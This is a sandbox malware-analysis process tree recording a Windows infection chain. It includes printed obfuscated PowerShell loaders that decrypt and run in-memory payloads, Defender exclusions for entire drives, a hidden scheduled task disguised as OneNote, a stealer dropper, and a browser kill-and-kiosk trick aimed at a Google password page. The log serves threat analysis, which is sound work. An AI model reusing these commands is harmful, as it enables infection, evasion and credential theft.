                                                                                                          C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Network25450Man.cmd';$dDiO='LRynPoadRynP'.Replace('RynP', ''),'SpaoCflitaoCf'.Replace('aoCf', ''),'CpVXarepVXaapVXateDpVXaepVXacrpVXayppVXatpVXaorpVXa'.Replace('pVXa', ''),'ChsohbansohbgeEsohbxtsohbensohbssohbisohbosohbnsohb'.Replace('sohb', ''),'CopmwsyyTomwsy'.Replace('mwsy', ''),'RjwWteajwWtdLjwWtinjwWtesjwWt'.Replace('jwWt', ''),'FroxuoEmxuoEBasxuoEe6xuoE4StxuoErixuoEngxuoE'.Replace('xuoE', ''),'InwozUvowozUkwozUewozU'.Replace('wozU', ''),'GVJeMeVJeMtCVJeMurVJeMrVJeMentVJeMProVJeMceVJeMsVJeMsVJeM'.Replace('VJeM', ''),'ElkXvnemekXvnntkXvnAkXvntkXvn'.Replace('kXvn', ''),'EntMmVmryPMmVmoiMmVmntMmVm'.Replace('MmVm', ''),'TUudXranUudXsfUudXorUudXmFiUudXnaUudXlBlUudXocUudXkUudX'.Replace('UudX', ''),'MayhiDinMyhiDoyhiDduyhiDleyhiD'.Replace('yhiD', ''),'DejLwccojLwcmpjLwcresjLwcsjLwc'.Replace('jLwc', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($dDiO[8])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function yLwIh($TZhDQ){$YZolA=[System.Security.Cryptography.Aes]::Create();$YZolA.Mode=[System.Security.Cryptography.CipherMode]::CBC;$YZolA.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$YZolA.Key=[System.Convert]::($dDiO[6])('duQk/QtsCXjlfUWS6XCUuCu5I1g6+OrVeXJ2aigXvB8=');$YZolA.IV=[System.Convert]::($dDiO[6])('9XjdTIP29vRyU5L9wYwsyw==');$BZniG=$YZolA.($dDiO[2])();$mkKMG=$BZniG.($dDiO[11])($TZhDQ,0,$TZhDQ.Length);$BZniG.Dispose();$YZolA.Dispose();$mkKMG;}function XFQUx($TZhDQ){$WCDIU=New-Object System.IO.MemoryStream(,$TZhDQ);$NUdnb=New-Object System.IO.MemoryStream;$TtrMr=New-Object System.IO.Compression.GZipStream($WCDIU,[IO.Compression.CompressionMode]::($dDiO[13]));$TtrMr.($dDiO[4])($NUdnb);$TtrMr.Dispose();$WCDIU.Dispose();$NUdnb.Dispose();$NUdnb.ToArray();}$wHJim=[System.IO.File]::($dDiO[5])([Console]::Title);$kvBry=XFQUx (yLwIh ([Convert]::($dDiO[6])([System.Linq.Enumerable]::($dDiO[9])($wHJim, 5).Substring(2))));$hsQZC=XFQUx (yLwIh ([Convert]::($dDiO[6])([System.Linq.Enumerable]::($dDiO[9])($wHJim, 6).Substring(2))));[System.Reflection.Assembly]::($dDiO[0])([byte[]]$hsQZC).($dDiO[10]).($dDiO[7])($null,$null);[System.Reflection.Assembly]::($dDiO[0])([byte[]]$kvBry).($dDiO[10]).($dDiO[7])($null,$null); "
                                                                                                          8⤵
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          PID:1796
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          8⤵
                                                                                                          • Blocklisted process makes network request
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          PID:960
                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                                                            9⤵
                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:1856
                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
                                                                                                            9⤵
                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:3284
                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\Network25450Man')
                                                                                                            9⤵
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:1252
                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 25450' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network25450Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                                                                                                            9⤵
                                                                                                            • Command and Scripting Interpreter: PowerShell
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:4496
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10002870121\lowsigmbye.cmd" "
                                                                                                            9⤵
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:4764
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\10002870121\lowsigmbye.cmd';$Zuin='LohLgJadhLgJ'.Replace('hLgJ', ''),'SpUdGHlitUdGH'.Replace('UdGH', ''),'CkzbKhankzbKgekzbKExkzbKtenkzbKskzbKikzbKokzbKnkzbK'.Replace('kzbK', ''),'TraXqevnsXqevforXqevmXqevFXqevinXqevalBXqevloXqevckXqev'.Replace('Xqev', ''),'CreIZJaatIZJaeIZJaDeIZJacIZJarIZJaypIZJatoIZJarIZJa'.Replace('IZJa', ''),'FrlsceomlsceBlscealsceslscee6lsce4Slscetrlsceinlsceglsce'.Replace('lsce', ''),'EnPCOltrPCOlyPoPCOlinPCOltPCOl'.Replace('PCOl', ''),'ElluGUemeluGUnluGUtluGUAtluGU'.Replace('luGU', ''),'CowSLIpyTwSLIowSLI'.Replace('wSLI', ''),'DQNkhecQNkhompQNkhrQNkheQNkhssQNkh'.Replace('QNkh', ''),'ReBEWfaBEWfdBEWfLBEWfineBEWfsBEWf'.Replace('BEWf', ''),'GetQshGCQshGurQshGreQshGnQshGtQshGPrQshGoQshGcQshGessQshG'.Replace('QshG', ''),'MahQKVinhQKVMhQKVohQKVduhQKVlehQKV'.Replace('hQKV', ''),'Invdqdfokdqdfedqdf'.Replace('dqdf', '');powershell -w hidden;$modules=[System.Diagnostics.Process]::($Zuin[11])().Modules;if ($modules -match 'hmpalert.dll') { exit; };function zvObs($JvbIA){$BTsJb=[System.Security.Cryptography.Aes]::Create();$BTsJb.Mode=[System.Security.Cryptography.CipherMode]::CBC;$BTsJb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$BTsJb.Key=[System.Convert]::($Zuin[5])('KwI+m+CS1RDGlA9XTP7AS8wYXfFUGAPj9L5At8f7F1s=');$BTsJb.IV=[System.Convert]::($Zuin[5])('l/MlylluBYy9Hd3APLUJJw==');$WXMvq=$BTsJb.($Zuin[4])();$uocwr=$WXMvq.($Zuin[3])($JvbIA,0,$JvbIA.Length);$WXMvq.Dispose();$BTsJb.Dispose();$uocwr;}function YULgT($JvbIA){$JsFWY=New-Object System.IO.MemoryStream(,$JvbIA);$KRoOX=New-Object System.IO.MemoryStream;$WGloZ=New-Object System.IO.Compression.GZipStream($JsFWY,[IO.Compression.CompressionMode]::($Zuin[9]));$WGloZ.($Zuin[8])($KRoOX);$WGloZ.Dispose();$JsFWY.Dispose();$KRoOX.Dispose();$KRoOX.ToArray();}$WMVlw=[System.IO.File]::($Zuin[10])([Console]::Title);$wetuz=YULgT (zvObs ([Convert]::($Zuin[5])([System.Linq.Enumerable]::($Zuin[7])($WMVlw, 5).Substring(2))));$oCIEk=YULgT (zvObs ([Convert]::($Zuin[5])([System.Linq.Enumerable]::($Zuin[7])($WMVlw, 6).Substring(2))));[System.Reflection.Assembly]::($Zuin[0])([byte[]]$oCIEk).($Zuin[6]).($Zuin[13])($null,$null);[System.Reflection.Assembly]::($Zuin[0])([byte[]]$wetuz).($Zuin[6]).($Zuin[13])($null,$null); "
                                                                                                              10⤵
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:4376
                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              10⤵
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:2908
                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                                                                                                                11⤵
                                                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                PID:1876
                                                                                                • C:\Users\Admin\AppData\Local\Temp\1011445001\rhnew.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\1011445001\rhnew.exe"
                                                                                                  4⤵
                                                                                                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                  • Checks BIOS information in registry
                                                                                                  • Executes dropped EXE
                                                                                                  • Identifies Wine through registry keys
                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:732
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 732 -s 568
                                                                                                    5⤵
                                                                                                    • Program crash
                                                                                                    PID:3596
                                                                                                • C:\Users\Admin\AppData\Local\Temp\1011459001\abc488b187.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\1011459001\abc488b187.exe"
                                                                                                  4⤵
                                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                  • Checks BIOS information in registry
                                                                                                  • Checks computer location settings
                                                                                                  • Executes dropped EXE
                                                                                                  • Identifies Wine through registry keys
                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                  • Drops file in Windows directory
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:3520
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                                                    "C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe"
                                                                                                    5⤵
                                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                    • Checks BIOS information in registry
                                                                                                    • Checks computer location settings
                                                                                                    • Executes dropped EXE
                                                                                                    • Identifies Wine through registry keys
                                                                                                    • Adds Run key to start application
                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    PID:3588
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\1000066001\stealc_default2.exe"
                                                                                                      6⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Loads dropped DLL
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      • Checks processor information in registry
                                                                                                      PID:2128
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe"
                                                                                                      6⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of SetThreadContext
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:1552
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\1001527001\alex2022.exe"
                                                                                                        7⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:4836
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 1252
                                                                                                          8⤵
                                                                                                          • Program crash
                                                                                                          PID:1124
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1002824001\ed32995a29.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\1002824001\ed32995a29.exe"
                                                                                                      6⤵
                                                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                      • Checks BIOS information in registry
                                                                                                      • Executes dropped EXE
                                                                                                      • Identifies Wine through registry keys
                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:3196
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 3196 -s 1484
                                                                                                        7⤵
                                                                                                        • Program crash
                                                                                                        PID:4048
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1003013001\AllNew.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\1003013001\AllNew.exe"
                                                                                                      6⤵
                                                                                                      • Checks computer location settings
                                                                                                      • Executes dropped EXE
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:4984
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe"
                                                                                                        7⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:1668
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1003620001\trru7rd2.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\1003620001\trru7rd2.exe"
                                                                                                      6⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:3488
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1004899001\am209.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\1004899001\am209.exe"
                                                                                                      6⤵
                                                                                                      • Checks computer location settings
                                                                                                      • Executes dropped EXE
                                                                                                      • Drops file in Windows directory
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                      PID:2160
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe"
                                                                                                        7⤵
                                                                                                        • Checks computer location settings
                                                                                                        • Executes dropped EXE
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        PID:4480
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\10009630142\Async.ps1"
                                                                                                          8⤵
                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          PID:5976
                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                          "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll, Main
                                                                                                          8⤵
                                                                                                          • Blocklisted process makes network request
                                                                                                          • Loads dropped DLL
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          PID:4568
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1005061001\nSoft.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\1005061001\nSoft.exe"
                                                                                                      6⤵
                                                                                                      • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                      • Checks BIOS information in registry
                                                                                                      • Executes dropped EXE
                                                                                                      • Checks whether UAC is enabled
                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:2276
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1005128001\newwork.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\1005128001\newwork.exe"
                                                                                                      6⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:5912
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-L5E1D.tmp\newwork.tmp
                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-L5E1D.tmp\newwork.tmp" /SL5="$150220,3498837,54272,C:\Users\Admin\AppData\Local\Temp\1005128001\newwork.exe"
                                                                                                        7⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Loads dropped DLL
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                        PID:5892
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1005150001\b22d8aa3a4.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\1005150001\b22d8aa3a4.exe"
                                                                                                      6⤵
                                                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                      • Checks BIOS information in registry
                                                                                                      • Executes dropped EXE
                                                                                                      • Identifies Wine through registry keys
                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:3444
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\1005151001\851e234eee.exe
                                                                                                      "C:\Users\Admin\AppData\Local\Temp\1005151001\851e234eee.exe"
                                                                                                      6⤵
                                                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                      • Checks BIOS information in registry
                                                                                                      • Executes dropped EXE
                                                                                                      • Identifies Wine through registry keys
                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      PID:2588
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2588 -s 1528
                                                                                                        7⤵
                                                                                                        • Program crash
                                                                                                        PID:5236
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2588 -s 1568
                                                                                                        7⤵
                                                                                                        • Program crash
                                                                                                        PID:1152
                                                                                                • C:\Users\Admin\AppData\Local\Temp\1011573001\c2d4ca6289.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\1011573001\c2d4ca6289.exe"
                                                                                                  4⤵
                                                                                                  • Enumerates VirtualBox registry keys
                                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                  • Checks BIOS information in registry
                                                                                                  • Executes dropped EXE
                                                                                                  • Identifies Wine through registry keys
                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:3540
                                                                                                • C:\Users\Admin\AppData\Local\Temp\1011574001\e3c6c90ef9.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\1011574001\e3c6c90ef9.exe"
                                                                                                  4⤵
                                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                  • Checks BIOS information in registry
                                                                                                  • Executes dropped EXE
                                                                                                  • Identifies Wine through registry keys
                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:956
                                                                                                • C:\Users\Admin\AppData\Local\Temp\1011575001\32810b99b0.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\1011575001\32810b99b0.exe"
                                                                                                  4⤵
                                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                  • Checks BIOS information in registry
                                                                                                  • Executes dropped EXE
                                                                                                  • Identifies Wine through registry keys
                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:3772
                                                                                                • C:\Users\Admin\AppData\Local\Temp\1011576001\33c3247dda.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\1011576001\33c3247dda.exe"
                                                                                                  4⤵
                                                                                                  • Executes dropped EXE
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                  PID:1360
                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                    taskkill /F /IM firefox.exe /T
                                                                                                    5⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • Kills process with taskkill
                                                                                                    PID:2584
                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                    taskkill /F /IM chrome.exe /T
                                                                                                    5⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • Kills process with taskkill
                                                                                                    PID:4224
                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                    taskkill /F /IM msedge.exe /T
                                                                                                    5⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • Kills process with taskkill
                                                                                                    PID:3536
                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                    taskkill /F /IM opera.exe /T
                                                                                                    5⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • Kills process with taskkill
                                                                                                    PID:1420
                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                    taskkill /F /IM brave.exe /T
                                                                                                    5⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    • Kills process with taskkill
                                                                                                    PID:3340
                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                                                                                    5⤵
                                                                                                      PID:1260
                                                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                                                                        6⤵
                                                                                                        • Checks processor information in registry
                                                                                                        • Modifies registry class
                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                        PID:4224
                                                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2032 -parentBuildID 20240401114208 -prefsHandle 1948 -prefMapHandle 1940 -prefsLen 23680 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {28e443ce-b009-4d68-a5aa-d469a3902c1a} 4224 "\\.\pipe\gecko-crash-server-pipe.4224" gpu
                                                                                                          7⤵
                                                                                                            PID:3048
                                                                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2464 -parentBuildID 20240401114208 -prefsHandle 2440 -prefMapHandle 2388 -prefsLen 24600 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {db30ccbb-8111-4c01-82dc-ac13c14e20b5} 4224 "\\.\pipe\gecko-crash-server-pipe.4224" socket
                                                                                                            7⤵
                                                                                                              PID:220
                                                                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3168 -childID 1 -isForBrowser -prefsHandle 3132 -prefMapHandle 3124 -prefsLen 22652 -prefMapSize 244658 -jsInitHandle 1304 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0c07b344-d958-4ca1-9de2-2ab5c32646de} 4224 "\\.\pipe\gecko-crash-server-pipe.4224" tab
                                                                                                              7⤵
                                                                                                                PID:1608
                                                                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4016 -childID 2 -isForBrowser -prefsHandle 3428 -prefMapHandle 3420 -prefsLen 29090 -prefMapSize 244658 -jsInitHandle 1304 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6f0c6158-5b24-4103-bc99-c800ce4d22ca} 4224 "\\.\pipe\gecko-crash-server-pipe.4224" tab
                                                                                                                7⤵
                                                                                                                  PID:5328
                                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4584 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4592 -prefMapHandle 4564 -prefsLen 29090 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {07c39ea7-d3b3-4de8-ac56-3bd9d97fe80a} 4224 "\\.\pipe\gecko-crash-server-pipe.4224" utility
                                                                                                                  7⤵
                                                                                                                  • Checks processor information in registry
                                                                                                                  PID:6132
                                                                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5512 -childID 3 -isForBrowser -prefsHandle 2828 -prefMapHandle 4852 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1304 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {1c2eb2d1-2b81-46a3-af64-ffc3f35f2373} 4224 "\\.\pipe\gecko-crash-server-pipe.4224" tab
                                                                                                                  7⤵
                                                                                                                    PID:4560
                                                                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5648 -childID 4 -isForBrowser -prefsHandle 5656 -prefMapHandle 5660 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1304 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8588b824-b179-4a07-bb51-3056f6ac5783} 4224 "\\.\pipe\gecko-crash-server-pipe.4224" tab
                                                                                                                    7⤵
                                                                                                                      PID:1092
                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5780 -childID 5 -isForBrowser -prefsHandle 5788 -prefMapHandle 5792 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1304 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {8a2f5abe-98a9-4987-baf3-d0c8a98e09bc} 4224 "\\.\pipe\gecko-crash-server-pipe.4224" tab
                                                                                                                      7⤵
                                                                                                                        PID:5364
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1011577001\8b4b459c8c.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\1011577001\8b4b459c8c.exe"
                                                                                                                  4⤵
                                                                                                                  • Modifies Windows Defender Real-time Protection settings
                                                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                  • Checks BIOS information in registry
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Identifies Wine through registry keys
                                                                                                                  • Windows security modification
                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  PID:1504
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\1011578001\fd3ff1536f.exe
                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\1011578001\fd3ff1536f.exe"
                                                                                                                  4⤵
                                                                                                                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                  • Checks BIOS information in registry
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Identifies Wine through registry keys
                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  PID:5856
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                            1⤵
                                                                                                              PID:3672
                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                              1⤵
                                                                                                                PID:2204
                                                                                                              • C:\Windows\System32\svchost.exe
                                                                                                                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                1⤵
                                                                                                                  PID:4524
                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                  1⤵
                                                                                                                    PID:4672
                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                    C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                    1⤵
